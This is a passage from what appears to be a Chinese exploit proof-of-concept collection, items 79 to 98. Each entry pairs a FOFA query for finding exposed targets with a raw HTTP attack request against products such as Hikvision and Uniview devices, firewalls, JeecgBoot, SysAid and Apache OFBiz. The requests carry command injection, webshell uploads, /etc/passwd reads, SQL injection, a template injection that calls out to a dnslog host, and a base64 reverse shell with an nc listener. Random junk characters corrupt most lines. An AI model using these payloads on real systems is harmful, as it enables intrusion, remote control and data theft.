& t" d6 H! ]+ e8 ~4 NYsOxWxSvj1KyZow1PTsh98fdu6l: }# \, p, {/ D! K [6 x# e" n
------YsOxWxSvj1KyZow1PTsh98fdu6l; _* ?- m4 j) R' f' A5 |
Content-Disposition: form-data; name="target"
0 @9 V# U7 ~: v5 C; x
2 d. o1 U) v' H% q/Applications/SkillDevelopAndEHS/
( C* E3 \, r; m; e# y. C, @------YsOxWxSvj1KyZow1PTsh98fdu6l--
4 `. F3 |- Y+ \! J7 W# `
Q0 C7 ? s6 A6 M4 q9 z+ a
0 q# |1 r5 \, T2 y! TGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
( B1 y" [& U9 h5 b7 J( H* L- {Host: x.x.x.x" k5 j$ M: q: G. u
: t0 Z$ j4 ] Q0 T
/ R/ D; Q6 n; t
79. BYTEVALUE 百为流控路由器远程命令执行- z2 d1 w7 ?$ y/ ^0 r. }6 }
FOFA:BYTEVALUE 智能流控路由器
( h0 z! ?; _% ~9 a; p4 @GET /goform/webRead/open/?path=|id HTTP/1.1
& U/ k7 q, u! ~$ _8 AHost:IP
$ s9 ?+ F( ^- s( pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.01 y% b3 o# A( n8 M; B# x7 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: M, G7 N: \$ o8 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ }; Q* G3 P* d- jAccept-Encoding: gzip, deflate" V4 z: f: M! i; E/ ]& @1 r
Connection: close- H8 t3 S5 y* R) l) m, K
Upgrade-Insecure-Requests: 1
( X6 `% n( r; G0 L8 @6 F4 j
6 y2 t% y# L0 }/ O% ^& a" m
1 r. v' d: X% M* l' c" E80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
6 g4 u S6 C+ h; XFOFA:app="速达软件-公司产品"
; p$ t7 y J3 Q; q \# M( T/ LPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
7 m, q d" c2 N- aHost: x.x.x.x
6 f- }4 h3 f$ eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# w2 o4 V% n8 ?, j
Content-Length: 27
0 b8 u) G- s5 x3 d7 U% n# x( DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# M4 B" ?; l7 mAccept-Encoding: gzip, deflate
# Z- F2 N: Q0 q- f4 fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( k$ z2 B% p+ p5 N' ?
Connection: close
7 U% j) m T6 o, U& yContent-Type: application/octet-stream: _9 U; f4 b# `, {& Z
Upgrade-Insecure-Requests: 1
( h \8 D7 u+ t p4 ^; J8 ]0 V/ s6 Y7 I6 h+ k, h: x+ _
<% out.print("oessqeonylzaf");%>
8 L1 i* N+ t1 _ U2 q2 {6 U' z# G4 r% Z3 ~' o
( i$ U" E/ K+ s$ @% n! d
GET /xykqmfxpoas.jsp HTTP/1.12 y8 C! c+ E$ i$ u- }
Host: x.x.x.x' h. g* H0 t, \, P! @5 Q7 ?# @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 o" }! t/ N: W* n0 |Connection: close5 _7 n, q/ i! J3 Y$ ~+ x6 E
Accept-Encoding: gzip
- l' B, }( A+ T. j2 Z' n3 p* D$ x: w$ [5 z+ F% L/ m
7 m( W4 M; z& V$ O81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露 R2 A! I4 Q4 l" n' Q8 M1 }
FOFA:app="uniview-视频监控"0 A# @# P' U- H6 ^; U
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
6 `" B0 c% w0 O" {3 i4 [8 O2 HHost: x.x.x.x1 [: m$ @$ R7 q1 [" L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 H! _6 r3 `' M0 l) I3 n& w R. W7 G
Connection: close
" K6 W# G& x. [9 `Accept-Encoding: gzip @ E* ]; ^4 X( Y& C, ?+ f
4 }+ x+ u; _+ P. K
4 `1 _5 p7 L- ^82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
( \2 X2 a- c- p% U& u `3 |8 |+ kFOFA:app="思福迪-LOGBASE"
' x' @- U1 {# c: ?POST /bhost/test_qrcode_b HTTP/1.1
) `# N6 w$ w4 k; O( sHost: BaseURL7 W& H* b+ ^! ~. C K
User-Agent: Go-http-client/1.1
9 l1 s2 D; T( ]+ s5 c" |; S2 eContent-Length: 23- j E% ^# Y7 Q" Q6 M, B" g
Accept-Encoding: gzip2 C' y: o/ F1 b+ t8 v( u3 w
Connection: close6 J+ L: l0 p& f8 C* \5 d% R
Content-Type: application/x-www-form-urlencoded
- e; l6 _, ^$ Q2 D a: @ lReferer: BaseURL
9 b2 H$ f4 S; Z5 l/ h
$ n8 s0 q2 m2 H9 Z$ q' f/ Hz1=1&z2="|id;"&z3=bhost r0 m& G7 O5 ?! j1 p# N
- G* Y2 G1 P) b- u ] d
/ P" x8 R) Q4 ~5 e; [83. JeecgBoot testConnection 远程命令执行
6 a b- U' w$ j: dFOFA:title=="JeecgBoot 企业级低代码平台"# j( e1 h r9 t5 A, l& ~% P! S0 a' M
" }4 K3 ?: W) m7 r7 k) P6 }
( I/ Z3 S+ E7 N1 E ?4 E/ m
POST /jmreport/testConnection HTTP/1.1: j/ f/ x& G9 R1 E* U$ v) j$ J
Host: x.x.x.x
7 B& l( C/ C. M! ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ d6 ~ D( ~# h5 n2 l, g8 F3 `Connection: close& B" k( @+ n+ m
Content-Length: 8881
. \$ H q5 E& |2 V0 V1 }Accept-Encoding: gzip
; k1 J+ ^$ U6 ~2 }Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
- C- i. _) l( q1 oContent-Type: application/json
, q" N0 |4 G# L: u* y, G; Z3 r$ j/ {
PAYLOAD
4 b. G, Y( Z5 u6 x
; x! A% l( S3 Q! U/ O84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
! Y5 x4 {, j7 U) r/ Q$ h& p6 N- p2 gFOFA:title=="JeecgBoot 企业级低代码平台"
: R6 {, y2 e j2 G- M# M& T* A" s8 d$ j; I8 `
: j0 g4 R0 c$ s8 H d; n, x* L9 |
; i7 w4 J+ z) x) v$ GPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1/ J7 b4 d" w; w. Y- m4 r/ ]
Host: 192.168.40.130:8080
7 H e4 Q% g4 Z0 E- ^User-Agent: curl/7.88.12 d3 H* q9 s$ Z; E3 T
Content-Length: 156
( T) f: i: _( y: E' b+ SAccept: */*
# D/ O9 l' i0 vConnection: close
5 j% b& j0 C+ [4 Q3 k+ LContent-Type: application/json+ Z$ w- N2 I2 H$ Q: U
Accept-Encoding: gzip
O8 i, D' |: F5 s0 l/ F" H: M0 c7 _; m `; x, ?9 Y1 ]0 F" B
{
! l/ y+ o( I) E4 h- E% d+ J "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
( `0 @; L; y1 \! K& L% v8 E( F "type": "0"
. J/ ]. L1 v9 w) y. E n}
% a! U8 X# W3 T' J& } t# b7 E& Y/ Z, f
8 c5 ^# `% I/ `+ Z& k- e85. SysAid On-premise< 23.3.36远程代码执行
. X2 C+ F/ O# r5 t, e eCVE-2023-47246# H% m/ u' R% g
FOFA:body="sysaid-logo-dark-green.png" 9 l- i+ X9 c5 h( W8 o7 C
EXP数据包如下,注入哥斯拉马' d S9 n. g' R- j3 I* @" H9 M
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
3 o# D! r5 f0 K0 m3 @" jHost: x.x.x.x
; v4 t- w3 e4 i$ \( qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 ?6 c! m& k7 Z) U/ G: ~' P) E
Content-Type: application/octet-stream" z) y$ n4 E6 R( O
Accept-Encoding: gzip$ \6 Z3 m8 v, }6 X; E3 Y9 G% j8 L
+ a& B2 v: i. t L, hPAYLOAD- l7 M L8 H$ X# L- |
& G5 Y, M: \& ]- Q( y9 `回显URL:http://x.x.x.x/userfiles/index.jsp8 C$ L: e; _5 h& ^5 U. ?
+ [9 r5 F* _% {. h! [8 J% G
86. 日本tosei自助洗衣机RCE
6 e5 e6 O1 }& SFOFA:body="tosei_login_check.php"- S8 V' @2 q( Y+ y2 H" C" R2 l
POST /cgi-bin/network_test.php HTTP/1.1
5 `# |& X! |. {# h( Y7 e# V* w5 A$ y$ B3 KHost: x.x.x.x
3 v9 q2 ^( p9 b% g7 i3 k7 i$ cUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
8 E7 V. g1 F! z3 }* G" qConnection: close
* [3 g, A1 R9 f3 \Content-Length: 44: S$ w! V" ?2 E7 a% ?$ s3 m, }7 | l
Accept: */*% Q, {- e0 Y2 j8 W8 p+ c; y) `- I
Accept-Encoding: gzip
; n' g6 n. G' {6 KAccept-Language: en
2 c2 w( X# U# W6 Z; kContent-Type: application/x-www-form-urlencoded' Z# L3 I. ^3 p, ?' y% P I; O
* L) f+ z* n& S. Y9 P
host=%0acat${IFS}/etc/passwd%0a&command=ping
8 ~1 ~& M2 z% h" E- }: Q. L$ a8 A) H: T8 i4 ]+ U7 O# T
, z: \4 |. ^# l& U5 q) q# H+ K87. 安恒明御安全网关aaa_local_web_preview文件上传
5 e0 G+ E' j6 L; a5 q# p& t6 pFOFA:title="明御安全网关"
4 ` ]2 q' ]3 |2 d# E% K vPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.19 h8 d* r: w' M) t
Host: X.X.X.X C4 @/ d# s/ I8 w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 @ R- R# t7 b E) b" c* i+ B
Connection: close
# H! u- m* y4 a$ U& m0 M$ j1 N% nContent-Length: 198
7 e& ?3 }% t8 `. n& {Accept-Encoding: gzip
0 y+ r$ T6 e, f$ d! aContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
$ a1 P/ l3 x" q- m" I; r
7 x2 }6 w7 u4 l$ u) k' X--qqobiandqgawlxodfiisporjwravxtvd3 \' T9 Q8 Q, H0 r1 y) }: C
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
' @* K6 l: Y, RContent-Type: text/plain1 [* J& H' l/ ]( ]( o
" d5 D- ]# r% o% m' H# A v9 a- }
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
. H" N- ]6 _% J8 |--qqobiandqgawlxodfiisporjwravxtvd--3 a* Q7 y) m4 ]* a0 }* @+ j
+ L0 g) D# E/ g/ V0 i
0 S4 i8 j3 p0 _2 f' b/jfhatuwe.php) o# i5 x* R! A' G, y9 Z
' D9 C5 V! i: n& o9 i. z4 e88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
a3 L! C& T5 I, h0 r7 k, qFOFA:title="明御安全网关"2 G* O |7 Q( L
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.13 u/ g6 N. [5 U3 ~& l& {
Host: x.x.x.xx.x.x.x
X) F, S$ } w: A, y! lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* E* r' O* a. w- h4 u" _7 [7 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ z& L% Z! j4 m9 B9 N4 L8 r* GAccept-Encoding: gzip, deflate
- T* G9 a: q; D+ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. o3 _5 V; x* n% k1 kConnection: close4 n7 I/ c7 \! g- T! l. J
5 V7 N" |2 @. u/ O4 I; q4 \
5 d7 R |5 I" J+ s" u, y1 p
/astdfkhl.php
% A$ z9 P; I' p5 `5 m1 J7 ^" R/ [1 q& f1 Q' g/ n
89. 致远互联FE协作办公平台editflow_manager存在sql注入
+ D4 m8 J4 i) S6 }: B" H OFOFA:title="FE协作办公平台" || body="li_plugins_download"
1 W& l: v4 Y' l1 Z" Z: g6 f3 L! DPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
! l/ m0 G" @) \Host: x.x.x.x0 w- N( y: f4 z0 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ _8 \1 Q4 B2 K+ L5 @' S; o
Connection: close
/ }0 O) G1 c, N1 a/ a2 U. s! t6 KContent-Length: 41
! h, y) x; {, ~) }# Q+ `Content-Type: application/x-www-form-urlencoded
& C. ?2 J1 m; }1 {Accept-Encoding: gzip" U! D, ]: f. w1 }7 H
% I a$ ~2 C. a0 q( voption=2&GUID=-1'+union+select+111*222--+, ?. }& `8 K6 s2 \8 h# }
% I1 ?7 a. y B o% i6 _
( ^) ~1 x0 A% L8 l$ U
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
1 n4 j' d/ S5 ]. |$ qFOFA:icon_hash="-1830859634"% I% t! }& m- ]. g# ]
POST /php/ping.php HTTP/1.1$ Y- h! s/ K* Z$ P. L) q0 I- \
Host: x.x.x.x$ t7 M9 V7 A e3 c2 C+ @3 X% n" ?; c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
* H, t, P3 T& {/ tContent-Length: 51; e9 c4 P/ y4 |# L5 S, a' V" A1 @, ~ V
Accept: application/json, text/javascript, */*; q=0.01" a9 ~( N5 B" l: [ v0 g
Accept-Encoding: gzip, deflate+ [) C" o" b$ C; B3 c7 h! t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 L5 W7 H. e. e p; KConnection: close
/ a$ L( s: k4 p3 t* ~Content-Type: application/x-www-form-urlencoded
6 V5 U; F3 C- H9 k9 @X-Requested-With: XMLHttpRequest
3 k9 T: ~0 m6 v# Y6 i p% r/ w/ W5 ~& L0 |$ n+ \# K% `9 G
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
# q4 Q* ~' o6 Q+ l5 t# X# i! B+ s; V6 X Z) w, ]; F' C
, X4 F' d3 ]* N. z) g1 f( s
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取5 O8 E3 N3 D6 l8 Z& V7 _$ s% V
FOFA:title="综合安防管理平台"
- w8 c9 c" e( tGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
5 L+ y4 `" n& v$ JHost: your-ip/ u! i. R8 x5 r$ m. g) y+ a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.369 O/ I' N1 K8 _5 Z$ _/ G
Accept-Encoding: gzip, deflate3 b+ ?" `, U, a/ r& Y3 T" t; z( ~) t
Accept: */*
% W4 F% e. L# V2 F- E3 MConnection: keep-alive) T% y8 T) C/ E4 K) L9 \$ u
; {8 e! u( o! E; ]4 I. j
0 Q8 Y( p* H9 g9 c& _' Q; J% i" P
0 i3 w% @/ h8 i+ \' ~( E4 S+ B92. 海康威视运行管理中心session命令执行; ^5 c$ [$ b# a3 d/ d2 T
Fastjson命令执行) \, b. p C" l. ]( S
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
1 M& O% Q1 \9 u* e, O0 U) X& ePOST /center/api/session HTTP/1.19 I5 L" } J+ X" B A) B. I
Host:- B; U7 P- m( p
Accept: application/json, text/plain, */*
" I1 H+ @( B! VAccept-Encoding: gzip, deflate
( x/ S. p3 j& t3 lX-Requested-With: XMLHttpRequest
7 R! \5 [% b- p& }' S3 fContent-Type: application/json;charset=UTF-8
" ]0 r2 R' L/ I! tX-Language-Type: zh_CN+ I# G' Z4 L* W9 j, R
Testcmd: echo test/ x1 `9 b% a$ |; L1 l" h1 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.365 c5 g0 ^& }8 ?$ T% z% _
Accept-Language: zh-CN,zh;q=0.9
( M4 R, A; `1 S7 k* qContent-Length: 5778
0 O7 g& Z* \- d# |* A7 O' Y0 V1 i' @
PAYLOAD9 p9 q( v, S6 j, c' @( M$ s
# h9 F1 b X0 u8 ~8 [
! D0 a: q0 z' p L# a
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传( z( S8 a1 b0 ~ x0 Y# ?) G5 r% }
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
4 A) D2 c* r! Q4 M4 RPOST /?g=app_av_import_save HTTP/1.1
1 ]2 V& v( f6 EHost: x.x.x.x1 M6 H* G5 y0 ? G% u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
{. e& ], Y9 F7 uUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; V0 _# S/ a+ {) O" o, B* W$ T7 p) b! ]' Q, H: N6 w
------WebKitFormBoundarykcbkgdfx
9 w3 t3 F0 x) c! \Content-Disposition: form-data; name="MAX_FILE_SIZE"
0 K0 U" f1 q) J! z4 n& p; G4 ?) [5 Q9 ~" b
100000002 H5 a |" f( a4 \3 G; {, a+ Q5 V8 B
------WebKitFormBoundarykcbkgdfx% ~* @0 ?' ~' R& z- ^& \: C
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"+ c* ?2 H3 j7 O* Q+ Q
Content-Type: text/plain
& w" o8 \, c* s7 \; n: a1 \; g* q
wagletqrkwrddkthtulxsqrphulnknxa" }2 W3 O Q# W0 W% T1 P1 X" r+ b/ m
------WebKitFormBoundarykcbkgdfx' m( W {( h, b7 d( F
Content-Disposition: form-data; name="submit_post"
3 ]3 {' V. S: q
; c. u, j! E% w+ f2 [: lobj_app_upfile/ {6 v- ~/ z' ~" g
------WebKitFormBoundarykcbkgdfx
: J5 l5 i) K& c4 n4 RContent-Disposition: form-data; name="__hash__"6 o) R3 j; E( j; g1 W7 {+ `; `
, |0 j& ?, N' U( q4 s. ^" B$ U6 l& ~1 u
0b9d6b1ab7479ab69d9f71b05e0e9445
* L& z/ T+ U9 q: Z; r y------WebKitFormBoundarykcbkgdfx--' Y9 f) k- p& A9 e- z
3 d) H# ~: |7 N. J" O9 i# U7 O
0 n6 K- @, ^5 N0 l9 y! ?
GET /attachements/xlskxknxa.txt HTTP/1.16 Y3 g) m1 F" Q" |9 d* O; X
Host: xx.xx.xx.xx
! \6 d$ C# _' h% {& |User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' q& `& r. x! f) a
2 r; x1 p5 f* B6 ]
9 K% b* o% k8 q- x94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传1 i( y5 |- G/ ]6 Q2 R
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==", r$ J/ X4 D+ d O
POST /?g=obj_area_import_save HTTP/1.1; R. |: o. M- {3 C. n- q
Host: x.x.x.x
, s3 s+ t3 D1 [+ B6 ~7 b$ |. qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
1 @/ d+ {: D) m; y! D; HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 j. H% G& c5 N8 e- k9 l* E: S: U' T. S) _4 y7 ?
------WebKitFormBoundarybqvzqvmt, `- h, Q$ U# H8 q- ~) v
Content-Disposition: form-data; name="MAX_FILE_SIZE"2 y& E. `4 A5 g# v' G. }& a
: u/ g$ m; s$ K( a
100000001 u- f) [ e6 u7 K
------WebKitFormBoundarybqvzqvmt: W2 S3 o V6 x4 \! x& ?; S
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"+ d5 r9 w' G, G' n1 L+ V3 p
Content-Type: text/plain
4 z+ T" C" l; h, A! P! _( H0 f. _, |# T- _+ z+ X& J/ Y2 D
pxplitttsrjnyoafavcajwkvhxindhmu
+ F+ | \4 w( c( T P9 Y------WebKitFormBoundarybqvzqvmt
6 ~. u2 i, s% a7 \ `5 I! BContent-Disposition: form-data; name="submit_post"" B* G) f8 v2 h* S4 ?( `+ s
! s3 S/ {& ~$ @$ Bobj_app_upfile
" G/ Z4 w4 t4 z& O------WebKitFormBoundarybqvzqvmt
6 m3 U$ n0 |/ s- oContent-Disposition: form-data; name="__hash__"0 {! o; B2 _3 F7 G+ K+ m& w5 d
6 Y6 u8 a) S- k5 m; A+ J0b9d6b1ab7479ab69d9f71b05e0e9445
6 m) H7 m* x! N4 Y, l4 k' V------WebKitFormBoundarybqvzqvmt--4 L& P. b* `3 R: b
" Y7 E* i8 n2 W& l1 X9 j
" Q0 F. ?: o9 Z' l {# A
6 I- l, A8 s3 i' w" @5 ^! ~- d% MGET /attachements/xlskxknxa.txt HTTP/1.1& E$ A; T( _9 I1 A9 c! A4 J* V# \
Host: xx.xx.xx.xx
) R% M" S S9 S% J3 h$ x5 }4 TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& L) f- D' z& j* l) Z$ j; F8 t" O. K O# P/ A
3 |8 p3 |4 S# j: `" L% g
- h1 ?2 _. x, [6 h
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行$ L! u5 g2 F2 _ \5 j& Y
CVE-2023-49070& x: g* W# ?9 M, f( U
FOFA:app="Apache_OFBiz"0 G( D, |' O& f( \8 ]3 C! A
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
; v* R! _* v* g3 p2 fHost: x.x.x.x
% e! A+ U1 j3 O1 G* h" `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* }& u0 G+ E2 g+ Y, B
Connection: close
6 o% M' X8 ]$ c0 n+ q, Z2 C% oContent-Length: 889
& g4 C) z2 f; J8 t6 vContent-Type: application/xml& ]) z0 i* F, [0 r8 \
Accept-Encoding: gzip
7 f2 {! [/ p3 P" Q1 u: u' C
, s1 E# @" S) d; B' g3 p<?xml version="1.0"?>
0 F% T! Z0 n! j4 ~1 p+ T<methodCall>
) F1 d$ _, w1 `, O <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
0 ^1 D* x! M$ o+ h+ M <params>5 P( ]8 W& h7 t
<param>) u& |% ~$ l" W4 V( T
<value>
; e |+ O+ K6 K+ G& ?+ R- k <struct>) k/ O% k9 ~. G! f# z: X
<member>( u1 E; j- ~2 B* P, u, d
<name>test</name>
# p; k8 x+ G# ?- T9 L; T, w <value>- E) J2 x5 _# I9 T4 v* B
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>/ v+ u4 g8 D: Y! t
</value>
8 Z o, [0 e% l6 K </member>
7 F6 i" I8 E8 Z4 E$ e/ U; R </struct>4 d L: q! C9 ?1 D2 o
</value>
+ s0 a5 g1 }( ^9 J7 [2 x </param>" Z- C( f* \: R+ z3 [! D$ a5 P
</params>. ?0 M) r9 e8 k: K% r( U: E
</methodCall>
6 I( x8 x! d3 f: g* b, [9 N' ~0 l# |0 {9 j
. v* g: m7 E4 C4 V* J$ }用ysoserial生成payload4 `4 z; w$ ]* g7 f6 Q+ K
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
3 i5 e3 N: p5 A7 p( M8 j1 K+ i/ b
! r3 @& f0 B: d
+ L i1 _+ F" _1 P6 ^将生成的payload替换到上面的POC, U* q: y: L2 C& C
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1% Z& \( ^) m& o$ s/ W8 B+ Z$ S/ A' e
Host: 192.168.40.130:8443
/ B5 X! P# I/ \6 W2 G/ BUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ Z0 K8 T& }* E, g
Connection: close
/ B+ z) D" N; J% \7 wContent-Length: 889
# q% r+ y4 }2 J# F- d3 xContent-Type: application/xml
% o/ u/ z* ]& |+ _: }Accept-Encoding: gzip
- R4 h2 T& v2 F0 b/ h% K% M! a
~- N5 R8 W) U& z9 R( dPAYLOAD
+ k9 j6 o) Y0 z; }6 G
4 E2 c2 K! t" z8 y+ J6 ?96. Apache OFBiz 18.12.11 groovy 远程代码执行# \3 H7 x0 ^! m2 p- P4 U( W' h7 N
FOFA:app="Apache_OFBiz"
5 d5 W% P: }. ^& _( W& A5 @0 J; kPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
% K% I+ E& P5 O5 F! t, @0 s/ MHost: localhost:8443
- p8 A* Z& p+ `5 z4 ~$ Q& k; i' oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 q( B! e& u1 e: C1 U/ }
Accept: */*
2 C. J: j% J# U7 F1 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 V. f _! Y1 S! N2 [7 }
Content-Type: application/x-www-form-urlencoded
4 K( }$ e6 D& h% z( K! g! ~Content-Length: 55
1 n0 H$ `/ H9 t& _5 w2 ]; o% w
. A& r7 o/ k% qgroovyProgram=throw+new+Exception('id'.execute().text);
2 y {% ^! e$ O8 F
3 W, y" _- S4 l. ^7 d9 h# i
8 q8 N. D6 p2 ^4 |( g/ [1 a, Z# V反弹shell4 e5 i9 J f6 t/ l. O
在kali上启动一个监听
7 F: a9 x9 v7 z; j0 cnc -lvp 7777
9 y. T( B( w' F
4 g4 t" d4 B8 ^5 @* R2 H# VPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
) x* V" v* y- O1 A7 _Host: 192.168.40.130:84433 c4 Q, b$ W7 s; T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' V1 v3 L5 K0 b/ C4 ?: _
Accept: */*0 |' Z* `8 c F* v7 e5 j4 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* C* y6 C- x c* |% D4 [( ]$ X
Content-Type: application/x-www-form-urlencoded
# n# j, L" M* JContent-Length: 71
1 w7 s5 g% l# P4 A! Y+ F
; E+ W" B) e% n" dgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();! K; W3 `4 S1 a Y3 l% S& F9 H
2 U- j/ E/ {6 w: }$ o# A
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行$ d0 L5 A* P- V4 L6 Q
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
9 o4 X$ g: b& u" w. u/ [GET /passport/login/ HTTP/1.1
$ y7 s9 S2 [1 i( U7 B$ k- f- o* p5 WHost: 192.168.40.130:8085, V9 t) l; z. u Z5 O4 j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 x+ G, d7 `* A1 N& B7 PAccept-Encoding: gzip
- W$ n6 g- N: P' F' r5 qConnection: close- n8 T T4 f% }4 A+ b
Cookie: rememberMe=PAYLOAD2 @8 p' C: p& }
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"$ n' m8 ~3 v/ L9 r$ D- I
! Q: O8 M/ f3 J7 B2 q6 q: k5 l
4 p+ d9 A$ s$ o( e; p$ x98. SpiderFlow爬虫平台远程命令执行
